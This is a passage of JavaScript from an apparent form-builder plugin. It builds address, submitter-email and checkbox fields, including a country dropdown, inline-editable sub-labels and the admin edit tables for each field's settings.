	coutries = ["Afghanistan","Albania",	"Algeria","Andorra","Angola","Antigua and Barbuda","Argentina","Armenia","Australia","Austria","Azerbaijan","Bahamas","Bahrain","Bangladesh","Barbados","Belarus","Belgium","Belize","Benin","Bhutan","Bolivia","Bosnia and Herzegovina","Botswana","Brazil","Brunei","Bulgaria","Burkina Faso","Burundi","Cambodia","Cameroon","Canada","Cape Verde","Central African Republic","Chad","Chile","China","Colombi","Comoros","Congo (Brazzaville)","Congo","Costa Rica","Cote d'Ivoire","Croatia","Cuba","Cyprus","Czech Republic","Denmark","Djibouti","Dominica","Dominican Republic","East Timor (Timor Timur)","Ecuador","Egypt","El Salvador","Equatorial Guinea","Eritrea","Estonia","Ethiopia","Fiji","Finland","France","Gabon","Gambia, The","Georgia","Germany","Ghana","Greece","Grenada","Guatemala","Guinea","Guinea-Bissau","Guyana","Haiti","Honduras","Hungary","Iceland","India","Indonesia","Iran","Iraq","Ireland","Israel","Italy","Jamaica","Japan","Jordan","Kazakhstan","Kenya","Kiribati","Korea, North","Korea, South","Kuwait","Kyrgyzstan","Laos","Latvia","Lebanon","Lesotho","Liberia","Libya","Liechtenstein","Lithuania","Luxembourg","Macedonia","Madagascar","Malawi","Malaysia","Maldives","Mali","Malta","Marshall Islands","Mauritania","Mauritius","Mexico","Micronesia","Moldova","Monaco","Mongolia","Morocco","Mozambique","Myanmar","Namibia","Nauru","Nepa","Netherlands","New Zealand","Nicaragua","Niger","Nigeria","Norway","Oman","Pakistan","Palau","Panama","Papua New Guinea","Paraguay","Peru","Philippines","Poland","Portugal","Qatar","Romania","Russia","Rwanda","Saint Kitts and Nevis","Saint Lucia","Saint Vincent","Samoa","San Marino","Sao Tome and Principe","Saudi Arabia","Senegal","Serbia and Montenegro","Seychelles","Sierra Leone","Singapore","Slovakia","Slovenia","Solomon Islands","Somalia","South Africa","Spain","Sri Lanka","Sudan","Suriname","Swaziland","Sweden","Switzerland","Syria","Taiwan","Tajikistan","Tanzania","Thailand","Togo","Tonga","Trinidad and Tobago","Tunisia","Turkey","Turkmenistan","Tuvalu","Uganda","Ukraine","United Arab Emirates","United Kingdom","United States","Uruguay","Uzbekistan","Vanuatu","Vatican City","Venezuela","Vietnam","Yemen","Zambia","Zimbabwe"];
	
	for(r=0;r<coutries.length;r++)
	{
		var option_ = document.createElement('option');
			option_.setAttribute("value", coutries[r]);
			option_.innerHTML = coutries[r];
			
		country.appendChild(option_);
	}

	var main_td  = document.getElementById('show_table');
      
	div_label.appendChild(label);
	div_label.appendChild(required );
		
	span_addres1.appendChild(street1);
	span_addres1.appendChild(street1_label);
		
	span_addres2.appendChild(street2);
	span_addres2.appendChild(street2_label);
	
	span_addres3_1.appendChild(city);		
	span_addres3_1.appendChild(city_label);
	span_addres3_2.appendChild(state);		
	span_addres3_2.appendChild(state_label);
		
	span_addres4_1.appendChild(postal);		
	span_addres4_1.appendChild(postal_label);
	span_addres4_2.appendChild(country);		
	span_addres4_2.appendChild(country_label);	
				
	div_address.appendChild(span_addres1);
	div_address.appendChild(span_addres2);	
	div_address.appendChild(span_addres3_1);	
	div_address.appendChild(span_addres3_2);
	div_address.appendChild(span_addres4_1);
	div_address.appendChild(span_addres4_2);
						
	div_element.appendChild(adding_type);
	div_element.appendChild(adding_required);
	div_element.appendChild(adding_country);
	div_element.appendChild(div_address);
	div_field.appendChild(div_label);
	div_field.appendChild(div_element); 
	div.appendChild(div_field);
	div.appendChild(br);
	div.appendChild(div_for_editable_labels);
	main_td.appendChild(div);
		
	if(w_field_label_pos == "top")
		label_top(i);
		
	change_class(w_class, i);
	refresh_attr(i, 'type_address');

	if(w_disabled_fields[0] == "yes")
		disable_fields(i,'street1');
	if(w_disabled_fields[1] == "yes")
		disable_fields(i,'street2');
	if(w_disabled_fields[2] == "yes")
		disable_fields(i,'city');
	if(w_disabled_fields[3] == "yes")
		disable_fields(i,'state');
	if(w_disabled_fields[4] == "yes")
		disable_fields(i,'postal');
	if(w_disabled_fields[5] == "yes")		
		disable_fields(i,'country');
	if(w_disabled_fields[6] == "yes")		
		disable_fields(i,'us_states');	
		
	jQuery(document).ready(function(jQuery)
	{		
		jQuery("label#"+i+"_mini_label_street1").click(function() {			
			if (jQuery(this).children('input').length == 0) 
			{				
				var street1 = "<input type='text' class='street1' style='outline:none; border:none; background:none; width:130px;' value=\""+jQuery(this).text()+"\">";
				jQuery(this).html(street1);					
				jQuery("input.street1").focus();		
				jQuery("input.street1").blur(function() {	
					var value = jQuery(this).val();			
					jQuery("#"+i+"_mini_label_street1").text(value);		
					document.getElementById('el_street1_label').innerHTML =	value;	
				});		
			}	
		});		
	
		jQuery("label#"+i+"_mini_label_street2").click(function() {		
			if (jQuery(this).children('input').length == 0)
			{		
				var street2 = "<input type='text' class='street2'  style='outline:none; border:none; background:none; width:130px;' value=\""+jQuery(this).text()+"\">";
				jQuery(this).html(street2);					
				jQuery("input.street2").focus();		
				jQuery("input.street2").blur(function() {	
					var value = jQuery(this).val();			
					jQuery("#"+i+"_mini_label_street2").text(value);
					document.getElementById('el_street2_label').innerHTML=	value;		
				});		
			}	
		});	

		jQuery("label#"+i+"_mini_label_city").click(function() {	
			if (jQuery(this).children('input').length == 0)
			{	
				var city = "<input type='text' class='city'  style='outline:none; border:none; background:none; width:130px;' value=\""+jQuery(this).text()+"\">";
				jQuery(this).html(city);			
				jQuery("input.city").focus();				
				jQuery("input.city").blur(function() {			
					var value = jQuery(this).val();		
					jQuery("#"+i+"_mini_label_city").text(value);	
					document.getElementById('el_city_label').innerHTML=	value;		
				});		
			}	
		});	
	
		jQuery("label#"+i+"_mini_label_state").click(function() {		
			if (jQuery(this).children('input').length == 0) 
			{	
				var state = "<input type='text' class='state'  style='outline:none; border:none; background:none; width:130px;' value=\""+jQuery(this).text()+"\">";	
				jQuery(this).html(state);		
				jQuery("input.state").focus();		
				jQuery("input.state").blur(function() {		
					var value = jQuery(this).val();			
					jQuery("#"+i+"_mini_label_state").text(value);
					document.getElementById('el_state_label').innerHTML=	value;		
				});	
			}
		});		

		jQuery("label#"+i+"_mini_label_postal").click(function() {		
			if (jQuery(this).children('input').length == 0)
			{			
				var postal = "<input type='text' class='postal'  style='outline:none; border:none; background:none; width:130px;' value=\""+jQuery(this).text()+"\">";
				jQuery(this).html(postal);			
				jQuery("input.postal").focus();			
				jQuery("input.postal").blur(function() {			
					var value = jQuery(this).val();		
					jQuery("#"+i+"_mini_label_postal").text(value);	
					document.getElementById('el_postal_label').innerHTML=	value;		
				});	
			}
		});	

		jQuery("label#"+i+"_mini_label_country").click(function() {		
			if (jQuery(this).children('input').length == 0) {		
				var country = "<input type='text' class='country'  style='outline:none; border:none; background:none; width:130px;' value=\""+jQuery(this).text()+"\">";
				jQuery(this).html(country);		
				jQuery("input.country").focus();	
				jQuery("input.country").blur(function() {		
					var value = jQuery(this).val();			
					jQuery("#"+i+"_mini_label_country").text(value);
					document.getElementById('el_country_label').innerHTML=	value;				
				});	
			}	
		});
	});	
}

function type_submitter_mail(i, w_field_label, w_field_label_size, w_field_label_pos, w_size, w_first_val, w_title, w_required, w_unique, w_class, w_attr_name, w_attr_value){
    document.getElementById("element_type").value="type_submitter_mail";

	delete_last_child();
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');
	var edit_main_tr9  = document.createElement('tr');
	var edit_main_tr10  = document.createElement('tr');
      			
	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');
		
	var edit_main_td9 = document.createElement('td');
	var edit_main_td9_1 = document.createElement('td');
		
	var edit_main_td10 = document.createElement('td');
	var edit_main_td10_1 = document.createElement('td');
		  
	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("class", "fm-field-label");
		el_label_label.setAttribute("for", "edit_for_label");
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
	
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");
	
	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";

	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");

	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
		el_label_left.innerHTML = "Left";	

	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");

	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
		el_label_top.innerHTML = "Top";
		
	if(w_field_label_pos=="top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");

	var el_size_label = document.createElement('label');
		el_size_label.setAttribute("class", "fm-field-label");
		el_size_label.setAttribute("for", "edit_for_input_size");
		el_size_label.innerHTML = "Field size(px) ";
	var el_size = document.createElement('input');
		   el_size.setAttribute("id", "edit_for_input_size");
		   el_size.setAttribute("type", "text");
		   el_size.setAttribute("value", w_size);
		   
			
			el_size.setAttribute("onKeyPress", "return check_isnum(event)");
            el_size.setAttribute("onKeyUp", "change_w_style('"+i+"_elementform_id_temp', this.value)");

	var el_first_value_label = document.createElement('label');
		el_first_value_label.setAttribute("class", "fm-field-label");
	        el_first_value_label.setAttribute("for", "el_first_value_input");
		el_first_value_label.innerHTML = "Value if empty";
	
	var el_first_value_input = document.createElement('input');
                el_first_value_input.setAttribute("id", "el_first_value_input");
                el_first_value_input.setAttribute("type", "text");
                el_first_value_input.setAttribute("value", w_title);
                el_first_value_input.setAttribute("onKeyUp", "change_input_value(this.value,'"+i+"_elementform_id_temp')");
				
	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
	        el_style_label.setAttribute("for", "el_style_textarea");
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "el_style_textarea");
		el_style_textarea.setAttribute("type", "text");
 		el_style_textarea.setAttribute("value", w_class);
                
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");
	
	
	var el_required_label = document.createElement('label');
		el_required_label.setAttribute("class", "fm-field-label");
		el_required_label.setAttribute("for", "el_required");
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_required");
                el_required.setAttribute("type", "checkbox");
                
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			
                el_required.setAttribute("checked", "checked");

	var el_unique_label = document.createElement('label');
		el_unique_label.setAttribute("class", "fm-field-label");
	    el_unique_label.setAttribute("for", "el_unique");
		el_unique_label.innerHTML = "Allow only unique values";
	
	var el_unique = document.createElement('input');
                el_unique.setAttribute("id", "el_unique");
                el_unique.setAttribute("type", "checkbox");
                
                el_unique.setAttribute("onclick", "set_unique('"+i+"_uniqueform_id_temp')");
	if(w_unique=="yes")
                el_unique.setAttribute("checked", "checked");
			
	var el_attr_label = document.createElement('label');
	    el_attr_label.setAttribute("class", "fm-field-label");           
		el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                
           	el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_text')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_text')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_text')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_text')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td10.appendChild(el_label_size_label);
	edit_main_td10_1.appendChild(el_label_size);
	
	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);
	
	edit_main_td3.appendChild(el_size_label);
	edit_main_td3_1.appendChild(el_size);
	
	edit_main_td4.appendChild(el_first_value_label);
	edit_main_td4_1.appendChild(el_first_value_input);

	edit_main_td5.appendChild(el_style_label);
	edit_main_td5_1.appendChild(el_style_textarea);
	edit_main_td7.appendChild(el_required_label);
	edit_main_td7_1.appendChild(el_required);
	
	edit_main_td9.appendChild(el_unique_label);
	edit_main_td9_1.appendChild(el_unique);
	
	
	edit_main_td8.appendChild(el_attr_label);
	edit_main_td8.appendChild(el_attr_add);
	edit_main_td8.appendChild(br4);
	edit_main_td8.appendChild(el_attr_table);
	edit_main_td8.setAttribute("colspan", "2");
	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	
	edit_main_tr10.appendChild(edit_main_td10);
	edit_main_tr10.appendChild(edit_main_td10_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr10);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr8);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_text');
	
//show table

	element='input';	type='text'; 
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_submitter_mail");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	    
	var adding_required = document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
	    
	var adding_unique= document.createElement("input");
            adding_unique.setAttribute("type", "hidden");
            adding_unique.setAttribute("value", w_unique);
            adding_unique.setAttribute("name", i+"_uniqueform_id_temp");
            adding_unique.setAttribute("id", i+"_uniqueform_id_temp");
			
	var adding = document.createElement(element);
            adding.setAttribute("type", type);
		
		
		if(w_title==w_first_val)
		{
			adding.style.cssText = "width:"+w_size+"px;";
			adding.setAttribute("class", "input_deactive");
		}
		else
		{
			adding.style.cssText = "width:"+w_size+"px;";
			adding.setAttribute("class", "input_active");
		}
			adding.setAttribute("id", i+"_elementform_id_temp");
			adding.setAttribute("name", i+"_elementform_id_temp");
			adding.setAttribute("value", w_first_val);
			adding.setAttribute("title", w_title);
			
			adding.setAttribute("onFocus", "delete_value('"+i+"_elementform_id_temp')");
			adding.setAttribute("onBlur", "return_value('"+i+"_elementform_id_temp')");
			adding.setAttribute("onChange", "change_value('"+i+"_elementform_id_temp')");
			

     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
					
      
      	var div_field = document.createElement('div');
           	div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
						
      	var div_label = document.createElement('div');
         	div_label.setAttribute("align", 'left');
         	div_label.style.display="table-cell";
			div_label.style.width=w_field_label_size+"px";
           	div_label.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var div_element = document.createElement('div');
         	div_element.setAttribute("align", 'left');
          	div_element.style.display="table-cell";
          	div_element.setAttribute("id", i+"_element_sectionform_id_temp");

      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
      

	    
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
			label.style.verticalAlign="top";
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
			required.style.verticalAlign="top";
	if(w_required=="yes")
			required.innerHTML = " *";
      	var main_td  = document.getElementById('show_table');
      
      	div_label.appendChild(label);
      	div_label.appendChild(required);
      	div_element.appendChild(adding_type);
      	div_element.appendChild(adding_required);
      	div_element.appendChild(adding_unique);
      	div_element.appendChild(adding);
      	div_field.appendChild(div_label);
      	div_field.appendChild(div_element);
      	
      
      	div.appendChild(div_field);
      	div.appendChild(br3);
      	main_td.appendChild(div);
	if(w_field_label_pos=="top")
				label_top(i);
change_class(w_class, i);
refresh_attr(i, 'type_text');
}

function type_checkbox(i, w_field_label, w_field_label_size, w_field_label_pos, w_field_option_pos, w_flow, w_choices, w_choices_checked, w_rowcol,  w_required, w_randomize, w_allow_other,w_allow_other_num, w_class, w_attr_name, w_attr_value, w_value_disabled, w_choices_value, w_choices_params) {

	document.getElementById("element_type").value="type_checkbox";

	delete_last_child();	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');   		
	var edit_main_tr9  = document.createElement('tr');
	var edit_main_tr10 = document.createElement('tr');
	var edit_main_tr11 = document.createElement('tr');
    var edit_main_tr12 = document.createElement('tr');
    var edit_main_tr13 = document.createElement('tr');  				

	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.setAttribute("id", "choices");
	var edit_main_td4_1 = document.createElement('td');	
		edit_main_td4_1.style.cssText = "padding:20px 0 0 25px; vertical-align:top;";
		
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
		
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');
		  
	var edit_main_td9 = document.createElement('td');
	var edit_main_td9_1 = document.createElement('td');
		
	var edit_main_td10 = document.createElement('td');
	var edit_main_td10_1 = document.createElement('td');
	
	var edit_main_td11 = document.createElement('td');
	var edit_main_td11_1 = document.createElement('td');
	
	var edit_main_td12 = document.createElement('td');
	var edit_main_td12_1 = document.createElement('td');
	
	var edit_main_td13 = document.createElement('td');
	var edit_main_td13_1 = document.createElement('td');
		  		
		  
	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("class", "fm-field-label");
		el_label_label.setAttribute("for", "edit_for_label");
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
		el_label_textarea.setAttribute("id", "edit_for_label");
		el_label_textarea.setAttribute("rows", "4");
		
		el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
	
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
		
	    el_label_size.setAttribute("value", w_field_label_size);
		
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");
	
	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";

	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");

	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
		el_label_left.innerHTML = "Left";	

	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");

	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
		el_label_top.innerHTML = "Top";
		
	if(w_field_label_pos=="top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");
				
	var el_option_position_label = document.createElement('label');
		el_option_position_label.setAttribute("class", "fm-field-label");
		el_option_position_label.innerHTML = "Field option label position";
	
	var el_option_position1 = document.createElement('input');
		el_option_position1.setAttribute("id", "edit_for_option_position_right");
		el_option_position1.setAttribute("type", "radio");        
		el_option_position1.setAttribute("name", "edit_for_option_position");
		el_option_position1.setAttribute("onchange", "option_left("+i+",'checkbox')");
	
	var el_option_left = document.createElement('label');
		el_option_left.setAttribute("for", "edit_for_option_position_right");
        el_option_left.innerHTML = "Left";	
		
	var el_option_position2 = document.createElement('input');
		el_option_position2.setAttribute("id", "edit_for_option_position_left");
		el_option_position2.setAttribute("type", "radio");
    	el_option_position2.setAttribute("name", "edit_for_option_position");
		el_option_position2.setAttribute("onchange", "option_right("+i+",'checkbox')");
	
	var el_option_right = document.createElement('label');
		el_option_right.setAttribute("for", "edit_for_option_position_left");
        el_option_right.innerHTML = "Right";	
		
	if(w_field_option_pos == "right")
		el_option_position2.setAttribute("checked", "checked");
	else
		el_option_position1.setAttribute("checked", "checked");				
				
	var el_label_flow = document.createElement('label');
		el_label_flow.setAttribute("class", "fm-field-label");
		el_label_flow.innerHTML = "Relative Position";
	
	var el_flow_vertical = document.createElement('input');
		el_flow_vertical.setAttribute("id", "edit_for_flow_vertical");
		el_flow_vertical.setAttribute("type", "radio");
		el_flow_vertical.setAttribute("value", "ver");
		el_flow_vertical.setAttribute("name", "edit_for_flow");
		el_flow_vertical.setAttribute("onchange", "refresh_rowcol("+i+",'checkbox')");
		
	var el_label_vertical = document.createElement('label');
		el_label_vertical.setAttribute("for", "edit_for_flow_vertical");
        el_label_vertical.innerHTML = "Vertical";		
		
	var el_flow_horizontal = document.createElement('input');
		el_flow_horizontal.setAttribute("id", "edit_for_flow_horizontal");
		el_flow_horizontal.setAttribute("type", "radio");
		el_flow_horizontal.setAttribute("value", "hor");
		el_flow_horizontal.setAttribute("name", "edit_for_flow");
		el_flow_horizontal.setAttribute("onchange", "refresh_rowcol("+i+",'checkbox')");
		
	var el_label_horizontal = document.createElement('label');
		el_label_horizontal.setAttribute("for", "edit_for_flow_horizontal");
        el_label_horizontal.innerHTML = "Horizontal";		
	
	if(w_flow == "hor")
		el_flow_horizontal.setAttribute("checked", "checked");
	else
		el_flow_vertical.setAttribute("checked", "checked");
				
	var el_rowcol_label = document.createElement('label');
	    el_rowcol_label.setAttribute("class", "fm-field-label");
		el_rowcol_label.innerHTML = "Rows/Columns";
	
	var el_rowcol_textarea = document.createElement('input');
		el_rowcol_textarea.setAttribute("id", "edit_for_rowcol");
		el_rowcol_textarea.setAttribute("type", "text");
 		el_rowcol_textarea.setAttribute("value", w_rowcol);
		el_rowcol_textarea.setAttribute("onChange", "refresh_rowcol('"+i+"','checkbox')");	

	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
		el_style_label.setAttribute("for", "el_style_textarea");
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
